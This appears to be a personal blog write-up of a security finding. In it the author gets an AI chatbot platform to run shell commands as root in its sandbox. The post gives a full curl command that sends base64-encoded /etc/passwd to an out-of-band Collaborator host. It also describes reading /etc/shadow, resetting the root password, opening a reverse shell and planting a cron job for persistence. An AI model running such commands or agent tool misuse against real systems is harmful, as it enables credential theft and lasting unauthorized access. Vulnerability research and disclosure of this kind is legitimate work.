How I Hacked AI (RCE + root + Persistence)
Discovery
I casually found a reel on Instagram which says :- “ In Helium AI, you can train the chatBOT with the custom data in the form of files, photos and PDFs “
I thought "Let's try this beast!"
What is Helium AI ?
Helium AI functions as an enterprise-grade “intelligence fabric” that unifies a company’s data, workflows, and decisions into one adaptive system. Its core technologies—Adaptive Intelligence Memory and the Helio orchestrator—allow it to retain context, automate complex processes, and coordinate multiple AI agents across departments. Unlike typical standalone chatbots, it integrates with 200+ business tools, enabling cross-functional automation, knowledge consolidation, and intelligent decision support. Overall, it positions itself as a central operational brain for organizations rather than a single-purpose AI assistant.
Enumeration
I created a free account on the platform and started exploring all the features. I never intended to breach anything — I only came here to explore and train a dataset. I uploaded some data to the AI and trained it for a few seconds. While testing the AI, I noticed that it was also executing commands in its sandbox environment, which is shown clearly in the site’s sidebar.
Then I ran whoami by simply telling the AI chatBOT to run…..
But wait 🤨 that’s not normal! An AI chatbot should not need to run system commands on user demand.
Then I tried other system commands as well….
cat /etc/passwd
Then I tried to change the password of the root user because the sandbox was running with root privileges 😎
I went for echo "root: 1234" | chpasswd
It successfully changed the root user’s password.
Now I tried to read the shadow file.
I ran cat /etc/shadow
NOW I CONFIRMED THIS IS NOT NORMAL — WHAT NEXT? 😏
Now I switched my normal mood to Hacker mood 👽 
Exploitation
I used Burp Collaborator to test out-of-band possibilities.
Process
- I opened Burp Suite Pro and set up Collaborator simply.
- On Helium AI, I instructed it to run this command:
1
curl -X POST https://uki8gsp7ob2eioq8z0xhmyxm2d87wzko.oastify.com -d "$(cat /etc/passwd | base64 | tr -d '\n')"
- After the command executed on the target, I got a callback, and in the
Requestbody I found the content of/etc/passwd.
Successfully got content of /etc/passwd in base64 encoded form. 
Gaining Access
Now it was time for a Reverse shell 😈
But there was a problem: neither I had a VPS or cloud system with a public IP, nor did the target have a public-facing endpoint — the target was hosted internally, so a reverse shell was technically impossible initially.
BUT.. BUT.. BUT.. Here’s where soft skills came in: I used my connections and after some time I got a VPS from a friend which had a PUBLIC IP.
Without wasting a second I rushed back to the AI chat and, after some trial-and-error with bash commands, I was able to create a working reverse shell payload suitable for that environment.
It gave me a reverse shell back to that VPS and now I was ROOT on the target with all permissions 🥳
You might be thinking that “Maybe it’s fake and this is not a reverse shell of Helium AI” — a fair doubt, since there was no direct proof that this was the Helium AI environment.
Let’s break that doubt! 😒
First, I made a file named Mynameispiyush-shukla which you can also see in the picture below. 
I created a file with my name via the shell, and it was visible when I ran ls through the ChatBOT. This demonstrates that I really had a reverse shell on that machine and could act within it.
Another proof
I again created a file named Piyush-Kumar-Shukla-created-this.txt. 
And when I did ls via the ChatBOT, it showed up. 
Maintaining Access
Now I had the shell but not a permanent, stable foothold — I was only a temporary controller. I wanted persistence so I wouldn’t have to re-run the payload through the chatBOT and increase my risk of being caught.
I added a cronjob with the payload that connects back to my friend’s VPS on ports 3333 and 9999 (to be in a safe zone) at an interval of every 2 minutes.
After disconnecting the current shell and starting nc on port 3333, it connected back without any further touch or command execution.
What Next?
I emailed all possible addresses related to Helium AI and now I don’t know whether they took this critical issue seriously.
I also registered this on https://cveform.mitre.org/ and received a confirmation email. After that, I heard nothing further from their side.
In the end, every unexpected discovery becomes a reminder that curiosity mixed with skill can uncover what others overlook. “Stay curious, stay sharp — because the world rewards those who explore beyond the obvious.”
Thanks !












